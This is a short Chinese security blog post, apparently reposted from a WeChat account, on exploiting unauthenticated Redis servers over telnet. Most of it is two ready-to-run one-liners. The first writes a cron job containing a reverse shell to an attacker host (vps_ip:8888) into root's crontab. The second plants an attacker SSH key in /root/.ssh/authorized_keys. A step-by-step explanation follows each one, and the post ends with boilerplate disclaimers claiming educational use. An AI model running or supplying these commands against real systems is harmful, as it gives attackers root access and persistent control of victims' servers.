使用telnet利用Redis未授权漏洞

admin 2025年6月3日10:28:39评论33 views字数 1297阅读4分19秒阅读模式

一行命令计划任务反弹 Shell

(sleep 1;echo "info";sleep 2;echo "set x "n* * * * * bash -i >& /dev/tcp/vps_ip/8888 0>&1n"";sleep 1;echo "config get dir";sleep 2;echo "config get dbfilename";sleep 2;echo "config set dir /var/spool/cron";sleep 1;echo "config set dbfilename root";sleep 1;echo "save";sleep 1;echo "exit")|telnet target 6379

1.sleep用于在每个命令之间添加延迟,以确保 Redis 服务器有时间处理每个命令。2.echo "info"获取 Redis 服务器的信息。3.echo "set x "n* * * * * bash -i >& /dev/tcp/vps_ip/8888 0>&1n""设置一个 Redis 键值对,其中键为x,值为一个反弹 Shell 的 cron 任务。4.获取 Redis 配置的目录和数据库文件名。5.将 Redis 的数据目录设置为/var/spool/cron,这是 cron 任务文件存放的目录。6.将 Redis 的数据库文件名设置为root,这样保存时会覆盖root用户的 cron 文件。7.save保存配置。8.exit退出 telnet 会话。

 

SSH 公钥写入

ssh-keygen -t rsa   # 然后目录下生成2个文件 私钥:id_rsa 公钥:id_rsa.pub(echo -e "nn"; cat id_rsa.pub; echo -e "nn")> temp.txtcat temp.txt #生成的ssh_payload(sleep 1;echo "info";sleep 2;echo "set x "nn复制生成的ssh_payloadnn"";sleep 1;echo "config get dir";sleep 2;echo "config get dbfilename";sleep 2;echo "config set dir  /root/.ssh/";sleep 1;echo "config set dbfilename authorized_keys";sleep 1;echo "save";sleep 1;echo "exit")|telnet target 6379ssh root@target -i id_rsa #本地连接即可

1.ssh-keygen -t rsa生成 SSH 密钥对。2.将生成的公钥id_rsa.pub包装到temp.txt文件中,生成 SSH payload。3.使用类似于反弹 Shell 的方法,通过 Redis 未授权访问将 SSH 公钥写入目标主机的/root/.ssh/authorized_keys文件中。4.通过ssh root@target -i id_rsa使用生成的私钥连接目标主机。

仅限交流学习使用,如您在使用本工具或代码的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。“如侵权请私聊公众号删文”。

原文始发于微信公众号(柠檬赏金猎人):使用telnet利用Redis未授权漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月3日10:28:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   使用telnet利用Redis未授权漏洞https://cn-sec.com/archives/3871255.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息